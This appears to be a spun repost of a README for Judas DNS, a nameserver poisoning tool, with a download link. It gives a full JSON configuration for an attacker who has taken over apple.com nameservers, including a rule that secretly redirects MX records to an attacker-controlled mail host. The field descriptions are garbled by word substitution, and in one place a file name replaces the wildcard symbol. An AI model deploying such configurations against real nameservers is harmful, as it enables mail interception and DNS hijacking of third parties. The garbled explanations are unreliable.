Ethical Hacking Nameserver DNS Poisoning using Judas DNS

Nameserver DNS Poisoning using Judas DNS

Judas DNS is a Nameserver DNS Poisoning Attack Tool which capabilities as a DNS proxy server constructed to be deployed rather than a taken over nameserver to carry out focused exploitation. Judas works by proxying all DNS queries to the reliable nameservers for a domain.

The magic comes with Judas’s rule configurations which let you change DNS responses relying on source IP or DNS question sort. This permits an attacker to configure a malicious nameserver to do issues like selectively re-route inbound e-mail coming from specified source IP ranges (through modified MX data), set extraordinarily lengthy TTLs to maintain poisoned data cached, and extra.

How to make use of Judas DNS Nameserver DNS Poisoning Tool

The following is an instance configuration for Judas for an instance situation the place an attacker has compromised/taken over one in all Apple’s authoritative nameservers (for apple.com):

 

{
    "version": "1.0.0",
    "port": 2248,
    "dns_query_timeout": 10000,
    "target_nameservers": [ "17.254.0.59", "17.254.0.50", "17.112.144.50", "17.112.144.59", "17.171.63.30", "17.171.63.40", "17.151.0.151", "17.151.0.152" ],
    "rules": [
        {
            "name": "Secretly redirect all emails coming from 127.0.0.1!",
            "query_type_matches": [ "MX" ],
            "ip_range_matches": [ "127.0.0.1/32" ],
            "modifications": [
                {
                    "answer": [
                        {
                            "name": "apple.com",
                            "type": 15,
                            "class": 1,
                            "ttl": 10,
                            "priority": 10,
                            "exchange": "hacktheplace.localhost"
                        }
                    ]
                }
            ]
        },
        {
            "name": "Make all responses NOERROR even if they've failed.",
            "query_type_matches": [ "*" ],
            "modifications": [
                {
                    "header": {
                        "rcode": 0
                    }
                }
            ]
        }
    ]
}

The above configuration worth functions are the next:

  • model: The configuration file format model (for now’s at all times 1.0.0).
  • port: The port Judas ought to run on.
  • dns_query_timeout: How lengthy to attend in milliseconds earlier than giving up on a reply from the upstream target nameserver.
  • target_nameservers: The legit nameservers to your target domain, all DNS queries can be despatched right here from Judas on behalf of all requesting purchasers.
  • guidelines: An inventory of guidelines with modifications to the DNS response to use if matched.
    • identify: Name of a given rule.
    • query_type_matches: List of question sorts to match on similar to CNAME, A, and many others. A wildcard JudasDNS-master.zip will also be specified to match any question sort.
    • ip_range_matches: List of IP ranges to match on. For selectively spoofing responses to a particular vary of IPs.
    • modifications: See the “Modifications” part of this README.

You can obtain Judas DNS right here:

JudasDNS-master.zip

LEAVE A REPLY

Please enter your comment!
Please enter your name here